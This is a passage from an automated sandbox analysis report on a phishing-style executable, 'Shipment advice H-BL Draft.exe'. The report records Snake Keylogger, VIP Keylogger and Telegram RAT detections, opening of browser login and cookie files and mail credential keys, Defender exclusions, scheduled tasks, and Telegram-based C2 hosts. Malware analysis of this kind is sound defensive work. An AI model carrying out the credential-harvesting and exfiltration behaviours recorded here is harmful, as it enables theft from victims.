                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 736, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 7888, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 7888, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.3718301984.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 736, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 7888, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3719627669.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 736, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 7888, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 7888, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		11
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol11
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		31
                    Virtualization/Sandbox Evasion                    		Security Account Manager31
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    System Network Configuration Discovery                    		SSHKeylogging14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Software Packing                    		DCSync13
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632061 Sample: Shipment advice H-BL Draft.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 52 reallyfreegeoip.org 2->52 54 api.telegram.org 2->54 56 2 other IPs or domains 2->56 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 13 other signatures 2->68 8 Shipment advice H-BL Draft.exe 7 2->8         started        12 PrcGlGVKeUCXxg.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 52->64 66 Uses the Telegram API (likely for C&C communication) 54->66 process4 file5 38 C:\Users\user\AppData\...\PrcGlGVKeUCXxg.exe, PE32 8->38 dropped 40 C:\...\PrcGlGVKeUCXxg.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpFBC0.tmp, XML 8->42 dropped 44 C:\...\Shipment advice H-BL Draft.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 powershell.exe 23 8->14         started        17 Shipment advice H-BL Draft.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 74 Antivirus detection for dropped file 12->74 76 Multi AV Scanner detection for dropped file 12->76 22 PrcGlGVKeUCXxg.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 78 Loading BitLocker PowerShell Module 14->78 28 conhost.exe 14->28         started        30 WmiPrvSE.exe 14->30         started        46 api.telegram.org 149.154.167.220, 443, 49751, 49755 TELEGRAMRU United Kingdom 17->46 48 checkip.dyndns.com 193.122.6.168, 49716, 49719, 49724 ORACLE-BMC-31898US United States 17->48 50 reallyfreegeoip.org 104.21.32.1, 443, 49717, 49718 CLOUDFLARENETUS United States 17->50 32 conhost.exe 20->32         started        80 Tries to steal Mail credentials (via file / registry access) 22->80 82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.